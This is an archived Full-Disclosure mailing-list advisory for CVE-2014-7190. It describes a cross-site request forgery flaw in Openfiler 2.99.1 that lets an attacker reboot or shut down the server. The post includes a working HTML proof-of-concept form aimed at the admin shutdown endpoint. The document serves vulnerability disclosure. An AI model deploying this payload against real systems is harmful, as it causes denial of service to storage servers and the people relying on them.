| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <5425BD94.2080709@yahoo.com> Date: Fri, 26 Sep 2014 22:25:08 +0300 From: Dolev Farhi <dolevf@...oo.com> To: fulldisclosure@...lists.org Subject: [FD] Openfiler DoS via CSRF (CVE-2014-7190) # Exploit author: @dolevff # Vendor homepage: http://www.openfiler.com # Affected Software version: 2.99.1 (latest) # Alerted vendor: 7.5.14 # CVE-2014-7190 Software Description ===================== Openfiler is a network storage operating system. With the features we built into Openfiler, you can take advantage of file-based Network Attached Storage and block-based Storage Area Networking functionality in a single cohesive framework. Vulnerability Description ========================= it is possible to restart/shutdown a server running openfiler due to missing session tokens and cause a denial of service attack. proof of concept: ========================= <html> <div align="center"> <pre> <h2><b>DoS<b></h2> <body> <form action="https://ip.add.re.ss:446/admin/system_shutdown.html" method="POST"> <input type="hidden" name="shutdowntype" value="reboot" /> <input type="hidden" name="delay" value="0" /> <input type="hidden" name="action" value="Shutdown" /> <input type="submit" name="submit" value="attack" /> </form> </body> </div> </html> _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists